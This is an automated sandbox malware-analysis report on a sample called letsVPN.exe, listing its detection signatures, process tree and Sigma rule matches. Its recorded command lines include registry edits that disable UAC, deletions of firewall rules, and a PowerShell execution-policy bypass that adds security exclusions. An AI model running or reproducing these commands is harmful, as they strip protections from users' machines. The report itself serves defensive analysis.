Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
letsVPN.exe

Overview

General Information

Sample name:letsVPN.exe
Analysis ID:1582024
MD5:ef0f5b020ea3238a98642cd7b56d84bb
SHA1:9bfb209e7d43739cc9dea530680b0c4ecdbf5981
SHA256:abf9a5632221e9fe423c9eeeb4c205497bf5bb1ff4aad8561609d81eaa82976e
Tags:exeuser-aachum
Infos:

Detection

Score:62
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies the DNS server
Modifies the windows firewall
Performs a network lookup / discovery via ARP
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample is not signed and drops a device driver
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Tap Installer Execution
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • letsVPN.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\letsVPN.exe" MD5: EF0F5B020EA3238A98642CD7B56D84BB)
    • cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 7420 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • netsh.exe (PID: 7460 cmdline: "C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xml MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • cmd.exe (PID: 7548 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7592 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 7608 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 7636 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 7828 cmdline: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mmc.exe (PID: 7884 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
    • sinaplayer_service.exe (PID: 7936 cmdline: "C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe" MD5: 68411B35F7B40B45AFC4A60A2681549D)
      • cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 6048 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • mmc.exe (PID: 8064 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
    • letsvpn-latest.exe (PID: 8108 cmdline: "C:\ProgramData\letsvpn-latest.exe" MD5: 9F5F358AA1A85D222AD967F4538BC753)
      • powershell.exe (PID: 6540 cmdline: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 7576 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 7848 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 8168 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7280 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7696 cmdline: netsh advfirewall firewall Delete rule name=lets MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 5356 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 1448 cmdline: netsh advfirewall firewall Delete rule name=lets.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 7152 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 2220 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 1240 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5364 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 5436 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsVPN MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6436 cmdline: netsh advfirewall firewall Delete rule name=LetsVPN MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • LetsPRO.exe (PID: 4428 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework MD5: 3530CB1B45FF13BA4456E4FFBCAE6379)
        • LetsPRO.exe (PID: 4372 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
      • LetsPRO.exe (PID: 3808 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" MD5: 3530CB1B45FF13BA4456E4FFBCAE6379)
        • LetsPRO.exe (PID: 2448 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
          • cmd.exe (PID: 4744 cmdline: "cmd.exe" /C ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 4568 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
          • cmd.exe (PID: 7132 cmdline: "cmd.exe" /C route print MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ROUTE.EXE (PID: 3640 cmdline: route print MD5: C563191ED28A926BCFDB1071374575F1)
          • cmd.exe (PID: 2824 cmdline: "cmd.exe" /C arp -a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ARP.EXE (PID: 6172 cmdline: arp -a MD5: 4D3943EDBC9C7E18DC3469A21B30B3CE)
  • svchost.exe (PID: 5712 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 5228 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\letsvpn\driver" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 8152 cmdline: DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000011C" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • svchost.exe (PID: 7120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • WmiApSrv.exe (PID: 6668 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 9A48D32D7DBA794A40BF030DA500603B)
  • svchost.exe (PID: 7296 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • LetsPRO.exe (PID: 5884 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
    • LetsPRO.exe (PID: 1284 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" "/silent" MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
  • LetsPRO.exe (PID: 7396 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Program Files (x86)\letsvpn\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dllJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Process Memory Space: letsvpn-latest.exe PID: 8108JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            56.2.LetsPRO.exe.682d0000.21.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

              Sigma Signatures

              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 8108, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 6540, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, ProcessId: 2448, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LetsPRO
              Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, ProcessId: 2448, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g43hckv.0dv.ps1
              Sigma detected: Suspicious Copy From or To System Directory
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\letsVPN.exe", ParentImage: C:\Users\user\Desktop\letsVPN.exe, ParentProcessId: 7264, ParentProcessName: letsVPN.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll, ProcessId: 7828, ProcessName: cmd.exe
              Sigma detected: Tap Installer Execution
              Source: Process startedAuthor: Daniil Yugoslavskiy, Ian Davis, oscd.community: Data: Command: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, NewProcessName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, OriginalFileName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 8108, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, ProcessId: 7576, ProcessName: tapinstall.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 8108, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 6540, ProcessName: powershell.exe
              Sigma detected: Suspicious Network Command
              Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\letsVPN.exe", ParentImage: C:\Users\user\Desktop\letsVPN.exe, ParentProcessId: 7264, ParentProcessName: letsVPN.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, ProcessId: 7372, ProcessName: cmd.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7732, ProcessName: svchost.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: letsVPN.exeVirustotal: Detection: 32%Perma Link
              Source: letsVPN.exeReversingLabs: Detection: 23%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 82.4% probability
              Machine Learning detection for sample
              Source: letsVPN.exeJoe Sandbox ML: detected
              Source: C:\ProgramData\letsvpn-latest.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.10 Nullsoft Install System v3.10License AgreementPlease review the license terms before installing letsvpn.Press Page Down to see the rest of the agreement.LetsVPN Terms of ServiceThese Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services).Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services.Intellectual Property RightsThe website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved.The Scope of Software LicensingA. Users can install use display and run the software on PC and mobile phones (same account support different devices).B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights.C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service.User InstructionsA. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc.B. LetsVPN Accounta. You understand that it is your responsibility to keep your LetsVPN account information confidentia
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dlll source: letsvpn-latest.exe, 00000013.00000003.2376519913.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375693525.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374330113.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377335396.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377822909.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2378990816.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2425444699.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2410292995.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: letsvpn-latest.exe, 00000013.00000003.2399608066.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2449650568.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: letsvpn-latest.exe, 00000013.00000003.2329768871.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: letsvpn-latest.exe, 00000013.00000003.2419235971.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: letsvpn-latest.exe, 00000013.00000003.2442323739.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, tapinstall.exe, 0000001C.00000002.2683090826.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001C.00000000.2681003659.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000000.2683431431.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000002.2728411628.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000002.2736525094.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000000.2729197986.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp
